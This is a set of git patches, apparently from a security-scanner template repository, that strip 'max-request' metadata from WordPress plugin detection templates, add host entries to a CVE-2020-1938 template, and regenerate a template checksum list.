+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-statistics/
metadata:
- max-request: 1
plugin_namespace: wp-statistics
wpscan: https://wpscan.com/plugin/wp-statistics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-super-cache/
metadata:
- max-request: 1
plugin_namespace: wp-super-cache
wpscan: https://wpscan.com/plugin/wp-super-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-user-avatar/
metadata:
- max-request: 1
plugin_namespace: wp-user-avatar
wpscan: https://wpscan.com/plugin/wp-user-avatar
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-recaptcha/
metadata:
- max-request: 1
plugin_namespace: wpcf7-recaptcha
wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-redirect/
metadata:
- max-request: 1
plugin_namespace: wpcf7-redirect
wpscan: https://wpscan.com/plugin/wpcf7-redirect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpforms-lite/
metadata:
- max-request: 1
plugin_namespace: wpforms-lite
wpscan: https://wpscan.com/plugin/wpforms-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wps-hide-login/
metadata:
- max-request: 1
plugin_namespace: wps-hide-login
wpscan: https://wpscan.com/plugin/wps-hide-login
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpvivid-backuprestore/
metadata:
- max-request: 1
plugin_namespace: wpvivid-backuprestore
wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
- max-request: 1
plugin_namespace: yith-woocommerce-wishlist
wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
tags: tech,wordpress,wp-plugin,top-100,top-200
From f98a8c1e567e66a7f587239d2e0129478f3b0487 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 23 Jun 2023 10:27:18 +0530
Subject: [PATCH 504/670] Update CVE-2020-1938.yaml
---
network/cves/2020/CVE-2020-1938.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml
index 9d1d636839..056e0f3a5c 100644
--- a/network/cves/2020/CVE-2020-1938.yaml
+++ b/network/cves/2020/CVE-2020-1938.yaml
@@ -27,6 +27,8 @@ tcp:
host:
- "{{Hostname}}"
+ - "{{Hostname}}"
+ - "{{Host}}:8009"
- "{{Host}}:8009"
read-size: 1024
From ee1521e5f05c6b459acfdd2f1b9b5851015fa7e3 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 23 Jun 2023 05:20:42 +0000
Subject: [PATCH 506/670] Auto Generated Templates Checksum [Fri Jun 23
05:20:42 UTC 2023] :robot:
---
templates-checksum.txt | 426 ++++++++++++++++++++---------------------
1 file changed, 213 insertions(+), 213 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index b469efa0ff..a086ec3577 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -181,14 +181,14 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d
helpers/wordpress/plugins/advanced-custom-fields.txt:0f436509ab5bd52c0ae2b582dad27602dc8c71e1
helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4
helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:3a20090f6629e82dc86182a58926523409ffdf49
-helpers/wordpress/plugins/all-in-one-seo-pack.txt:21cc7309d1a344b06354e74cd981e8a7d697803c
+helpers/wordpress/plugins/all-in-one-seo-pack.txt:a35a10fae0f653f425d1e5ae6ebf257254ab4b92
helpers/wordpress/plugins/all-in-one-wp-migration.txt:79e1c1c9108cfa9e61bea3ef6226c99f095888fb
helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:9fe4681fdf4528a009bfe5a862fb05457cc811cb
helpers/wordpress/plugins/amp.txt:51ddbf27bf181d542a23643649c61739795a6771
helpers/wordpress/plugins/antispam-bee.txt:b91ff026739750b181b34969295fb93cf8fdc898
helpers/wordpress/plugins/astra-sites.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317
helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711
-helpers/wordpress/plugins/autoptimize.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a
+helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3
helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109
helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6
helpers/wordpress/plugins/better-wp-security.txt:c9d80c377a036d155be198abbb91a3fb1d887536
@@ -202,7 +202,7 @@ helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09
helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:2f42d9eff165ff903900a0f16da2e2d14bf3c5d9
helpers/wordpress/plugins/cloudflare.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619
helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62
-helpers/wordpress/plugins/coblocks.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62
+helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5
helpers/wordpress/plugins/code-snippets.txt:1ee09476b338ca8261ad83be6aefa18693436588
helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6
helpers/wordpress/plugins/complianz-gdpr.txt:e34cf029ebf2ac799f0bb13727fc79e76b2e5ecb
@@ -220,7 +220,7 @@ helpers/wordpress/plugins/disable-comments.txt:8f52888ff7e35fd5ca310231fa076be12
helpers/wordpress/plugins/disable-gutenberg.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd
helpers/wordpress/plugins/duplicate-page.txt:69a192666c004f35303d55baa6cc828eb977144f
helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e
-helpers/wordpress/plugins/duplicator.txt:caede917a8676edcac7e9d6481043710792411c9
+helpers/wordpress/plugins/duplicator.txt:6fd4fddb5287b4b436c24d78bff003d1ac10200d
helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt:dd48223123cc0aa36ed7f2190e593ca1ace58e24
helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d0362ed6
helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae
@@ -236,7 +236,7 @@ helpers/wordpress/plugins/facebook-for-woocommerce.txt:136e0602de6fdd3ca4ce18b9a
helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614
helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6
helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c
-helpers/wordpress/plugins/fluentform.txt:e881296a73d9b5b8b2320adc83e958594c7cfc29
+helpers/wordpress/plugins/fluentform.txt:73b8603e920872b1a0062cf945de2d7b64e30cb6
helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e
helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6
@@ -282,16 +282,16 @@ helpers/wordpress/plugins/mainwp-child.txt:980feb4697a9a59378889074eb2a9c667eb85
helpers/wordpress/plugins/malcare-security.txt:8a354e6fda90148b0c22992b849e693b1ed6749f
helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3
helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43
-helpers/wordpress/plugins/meta-box.txt:2d8d7a2994b4a941f25864496a40e7be21769689
+helpers/wordpress/plugins/meta-box.txt:8a4874fdff1ab036389b4739f479332aa0c63551
helpers/wordpress/plugins/ml-slider.txt:41189fb0a024491b57bd8e338a8b5853fe6265c5
-helpers/wordpress/plugins/newsletter.txt:1a1fd62737f6a9aa26daa6d295f6390cacb4857d
+helpers/wordpress/plugins/newsletter.txt:66bbc13ad9e3147893b990ab1a35d08623caab2a
helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655
helpers/wordpress/plugins/nextgen-gallery.txt:9144c432d473baecd93eb0985d3874cf3bb6a126
helpers/wordpress/plugins/ninja-forms.txt:b1fa250248667d473f40086fa4a2cd4645e99d0f
helpers/wordpress/plugins/ocean-extra.txt:5f6af51e77b84cd6616d4eaa100a736096568d86
helpers/wordpress/plugins/official-facebook-pixel.txt:c7a799ba251102d32c4623f4036bddb752445f20
helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8
-helpers/wordpress/plugins/optinmonster.txt:930d0909821c3f6c5f8dc628542c3a0c86e196fe
+helpers/wordpress/plugins/optinmonster.txt:d0cbe674a49975e50331a1a279e25a39e714edab
helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
helpers/wordpress/plugins/password-protected.txt:1ff0f47f469eb98d13878242f03511f986edbcd4
helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58
@@ -303,7 +303,7 @@ helpers/wordpress/plugins/popup-builder.txt:9d6a9d6356ced33784bbde254c46c600df05
helpers/wordpress/plugins/popup-maker.txt:c70da539b9e83a50bb70013e6a5cb6e9d4623d5c
helpers/wordpress/plugins/post-smtp.txt:106ca8d85638866255a70e746e9653cec398864b
helpers/wordpress/plugins/post-types-order.txt:ccc7f2bf6d0604d86f3d33a12b75411b311e9dfe
-helpers/wordpress/plugins/premium-addons-for-elementor.txt:26f0040ffcee1a331bafe2204af353696199c94e
+helpers/wordpress/plugins/premium-addons-for-elementor.txt:1260b2a71619b1053aab0cd5493480494a027b5e
helpers/wordpress/plugins/pretty-link.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5
helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
helpers/wordpress/plugins/really-simple-ssl.txt:cfb1a020caaeba8b61a9e907652aed3d696c8ce9
@@ -329,11 +329,11 @@ helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b1
helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb
helpers/wordpress/plugins/tablepress.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4
helpers/wordpress/plugins/taxonomy-terms-order.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e
-helpers/wordpress/plugins/the-events-calendar.txt:eecaf8be5654f259a19f021dd696c8aed0425326
+helpers/wordpress/plugins/the-events-calendar.txt:5661ec9d748ff7fd63a65f26250276618fade1e7
helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
helpers/wordpress/plugins/tinymce-advanced.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf
helpers/wordpress/plugins/translatepress-multilingual.txt:89941265e418c7729912b574c9b29eff77c5b172
-helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:f8b1cdd780aa1026f0dd192b2c25ed46c6cbe798
+helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34
helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f
helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d
helpers/wordpress/plugins/updraftplus.txt:ae159df5f109948cfff953af10b1dfdfb65e0adf
@@ -5291,213 +5291,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
-http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:45b1c43ca8b833a6d10518e214d69e9c87e3282c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
-http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
-http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
-http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
-http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
+http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
